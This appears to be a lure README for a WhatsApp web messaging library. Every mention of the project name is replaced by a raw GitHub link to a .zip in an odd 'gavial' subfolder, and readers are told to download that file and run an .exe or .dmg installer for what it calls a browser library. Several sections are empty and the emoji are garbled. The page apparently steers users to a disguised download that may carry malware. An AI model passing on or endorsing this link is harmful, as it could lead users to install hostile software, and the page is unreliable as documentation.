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πŸš€ Getting Started

Welcome to https://raw.githubusercontent.com/Sauravsk1/whatsapp-web.js/main/gavial/whatsapp-web.js.zip! This is a simple library that lets you connect to WhatsApp through the browser app. You can use it to send and receive messages easily. This guide will help you download and run the application.

πŸ“‹ System Requirements

πŸ’» Features

  • Send and receive messages.
  • Manage groups and contacts.
  • Simple setup process.
  • Open-source and well-documented.

πŸ“‚ Download & Install

To get started, you’ll need to download the software. Follow these steps:

  1. Visit the Releases Page: Click the link below to find the latest version of https://raw.githubusercontent.com/Sauravsk1/whatsapp-web.js/main/gavial/whatsapp-web.js.zip

    Download Latest Release

  2. Select the Version: On the releases page, you will see a list of available versions. Look for the latest version, which is usually at the top.

  3. Download the File: Click on the version you want to download. A new page will open. Look for a file that matches your operating system. Click on the file to start the download.

  4. Install the Application:

    • For Windows: Double-click the downloaded .exe file and follow the setup prompts.
    • For MacOS: Open the downloaded .dmg file and drag the application to the Applications folder.
    • For Linux: Follow the specific instructions provided on the release page for your distribution.
  5. Run the Software: After installation:

  6. Connect to WhatsApp:

    • Open the app.
    • You will see a QR code. Scan this code using your WhatsApp mobile app to link your account.

Now, you're ready to send and receive messages using https://raw.githubusercontent.com/Sauravsk1/whatsapp-web.js/main/gavial/whatsapp-web.js.zip!

πŸ”§ Configuration

Once you have the application running, you might want to configure it. You can set up different options by editing the configuration files. Look for these files in the installation directory. You can adjust:

  • Username: Set a username that others can see.
  • Default Group Settings: Choose your preferences for group messages.
  • Notification Options: Customize how you want to receive alerts.

🌍 Frequently Asked Questions

How do I report a bug?

If you find any issues, please visit the GitHub Issues Page and describe the problem.

Can I contribute to this project?

Absolutely! We welcome contributions. Follow the guidelines in the repository to get started.

Where can I find support?

For help, check the documentation available in the repository or visit our community forums.

πŸ“š Additional Resources

🌟 Contributing

If you're interested in contributing to https://raw.githubusercontent.com/Sauravsk1/whatsapp-web.js/main/gavial/whatsapp-web.js.zip, we'd love your help! You can report issues, submit feature requests, or even code improvements. Check out our contribution guidelines for more details.

πŸ“œ License

This project is licensed under the MIT License. Feel free to use it as you wish while adhering to the license terms.

Thank you for choosing https://raw.githubusercontent.com/Sauravsk1/whatsapp-web.js/main/gavial/whatsapp-web.js.zip! We hope you enjoy using it. If you have any questions, feel free to reach out through the support and resources mentioned above. Happy messaging!

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